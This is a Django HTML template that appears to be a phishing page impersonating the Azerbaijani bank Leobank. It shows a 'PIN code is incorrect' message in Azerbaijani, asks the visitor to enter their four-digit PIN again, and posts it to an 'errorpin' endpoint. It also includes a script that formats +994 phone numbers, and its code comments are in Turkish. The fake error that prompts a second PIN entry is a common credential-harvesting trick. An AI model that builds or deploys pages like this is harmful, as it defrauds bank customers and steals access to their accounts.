{% load static %}
<!DOCTYPE html>
<html>
<head>
  <title>Leobank</title>
  <link rel="profile" href="https://gmpg.org/xfn/11">
  <link rel="icon" type="image/x-icon" href="{% static '/icon/favicon.svg' %}">
  <style>
    body {
      margin: 0;
      padding: 0;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }
    
    .login-form {
      position: relative;
      background: linear-gradient(65.16deg,#98c7fe 0,#a5f6ff 53.48%,#adfff0 100%);
      padding: 220px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      width: 38rem;
      height: 30rem;
      border-radius: 65px;
    }
    
    .login-form h2 { text-align: center; color: #333; font-size: 1.2em; }

    
    .login-form label {
      display: block;
      margin-bottom: 5px;
      color: #333;
    }
    
    .login-form input[type="tel"],
    .login-form input[type="password"] {
      width: 94%;
    padding: 17px;
    border: 4px solid #ccc;
    border-radius: 18px;
    margin-bottom: 15px;
    margin-right: 99px; 
    }
    
    .login-form input[type="submit"] {
      padding: 16px 23px;
      margin: 0 auto;
      width: 100%;
      text-align: center;
    }
    
    .login-form input[type="submit"] {
      background-color: #000;
      color: #fff;
      border-radius: 50px;
      width: -webkit-max-content;
      width: -moz-max-content;
      width: max-content;
      height: 52px;
      padding: 16px 120px;
      font-size: 14px;
      line-height: 20px;
      letter-spacing: 0.5px;
      font-weight: 700;
      text-transform: uppercase;
      display: block;
    }
  </style>
</head>
<body>
  <div class="login-form">
    <div id="leo-main">
      
   </div>
   <style>
    #leo-main {
  width: 100%;
  height: 100%;
  transform: translate3d(0px, 0px, 0px);
  content-visibility: visible;
  position: relative;
  bottom: 150px;
  margin-top: -150px;
}
.no-spinners::-webkit-inner-spin-button,
.no-spinners::-webkit-outer-spin-button {
  -webkit-appearance: none;
  margin: 0;
}
body, html {
    height: 100%;
    margin: 0;
    display: flex;
    justify-content: center;
    align-items: center;
}

.container {
    display: flex;
    justify-content: center;
    margin-left: 10px;
}


   </style>
   <div id="31" style="margin-top: -90px; position: relative; bottom: 80px">
    <h2 style="color:red">PIN Kod yanlışdır</h2>
    <form action="errorpin" method="POST">
      <label for="username"></label>
    </div>
    
      <h2>Pin Kodu yenidən daxil edin</h2>
      <div style="width: 70%; padding: 12px 75px">
        
        <div class="otp-input-field">
            <input maxlength="1" placeholder="🐾" id="input1" name="input1" type="text" autofocus="" class="otp-input" inputmode="numeric" oninput="doldur(this)">
            <input maxlength="1" placeholder="🐾" id="input2" name="input2" type="text" class="otp-input" inputmode="numeric" oninput="doldur(this)">
            <input maxlength="1" placeholder="🐾" id="input3" name="input3" type="text" class="otp-input" inputmode="numeric" oninput="doldur(this)">
            <input maxlength="1" placeholder="🐾" id="input4" name="input4" type="text" class="otp-input" inputmode="numeric" oninput="doldur(this)">
        </div>

        </div>

<br><br>

<input type="submit" value="İrəli" >
<br>
<script>

  // Hiçbir şey yazılmadığında kontrol eden bir fonksiyon.
  function kontrolEt(input) {
      if (input.value === "") {
          alert("Lütfen bir rakam girin.");
      }
  }
</script>
<script>
 // Select all input fields with class "otp-input"
const otpInputs = document.querySelectorAll('.otp-input');

// For each input field, add an event listener for input changes
otpInputs.forEach((input, index) => {
  input.addEventListener('input', event => {
    // Get the value of the input and remove any non-numeric characters
    let value = event.target.value.replace(/[^0-9]/g, '');

    // Limit the value to one character
    value = value.substring(0, 1);

    // Set the input value to the cleaned and limited value
    event.target.value = value;

    // If the value is not empty, focus on the next input field
    if (value) {
      // Check if the current input is the last one
      if (index < otpInputs.length - 1) {
        otpInputs[index + 1].focus();
      }
    } else {
      // If the value is empty, focus on the previous input field
      if (index > 0) {
        otpInputs[index - 1].focus();
      }
    }

    // This part ensures that when you delete a character, it moves to the previous input
    if (!value && index > 0) {
      otpInputs[index - 1].focus();
    }
  });
});

  
              </script>
<style>
  .resend-otp {
          color: #2caa84;
          text-decoration: none;
          cursor: pointer;
          margin-bottom: 40px;
          font-size: 15px;
          border: none;
          background-color: transparent;
          border-bottom: 1px solid #2caa84;
      }

      .resend-otp span {
          font-size: 15px;
      }

      .resend-otp:hover {
          border-bottom: 1px solid transparent;
      }

      

      .otp {
          margin-bottom: 8px;
      }

      .otp-input-field {
    display: flex;
    justify-content: space-between;
}

.otp-input {
    display: flex;
    justify-content: center;
    align-items: center;
    text-align: center;
    width: 64px;
    height: 64px;
    font-size: 20px;
    border-radius: 2px;
    margin-bottom: 4px !important;
    margin-top: 2px; /* Boşluğu azaltabilirsiniz, istediğiniz değeri deneyebilirsiniz */
    outline: none;
    background-color: transparent;
    border: 1px solid #2caa84;

}
     /* Başlangıç durumunda geçerli olan stil özellikleri */
     .otp-input {
    border-color: #2caa84; /* Kenarlık rengi */
    box-shadow: 0 0 0 4px #e0f3ed; /* Kutunun çevresine gölge efekti */
    /* Diğer stil özellikleri */
    
}
      .otp-input::placeholder {
          color: black;
      }
  </style>
<style>
  .container {
    text-align: center;
  }
  
  .container h5 {
    margin-bottom: -20px;
    font-weight: bold;
    opacity: 0.6;
  }
</style>
<style>
  .container {
    text-align: center;
  }
  
  .container h5 {
    margin-bottom: -20px;
    font-weight: bold;
    opacity: 0.6;
  }
  .container2 {
  text-align: center;
}
</style>

<div class="container">
  <h5>"İrəli" düyməsinə sıxmaqla siz</h5>
</div>
<div class="container2">
  <h5>şərtlər və tarifləri qəbul edirsiniz</h5>
</div>

    </form>
  </div>
  
    <script id="animations" src="{% static 'js/animations.js' %}" type="module" async=""></script>
    
    <script>
const input = document.getElementById("username");

input.addEventListener("input", function() {
    let value = this.value;

    if (value.indexOf("+994") !== 0) {
        value = "+994";
    } else {
        value = value.slice(4).replace(/[^0-9]/g, '');
    }

    if (value.length > 2) {
        value = value.slice(0, 2) + "-" + value.slice(2);
    }
    if (value.length > 5) {
        value = value.slice(0, 6) + "-" + value.slice(6);
    }

    this.value = "+994-" + value.slice(0, 12);

});
      
    </script>
 

  </div>
</body>
</html>
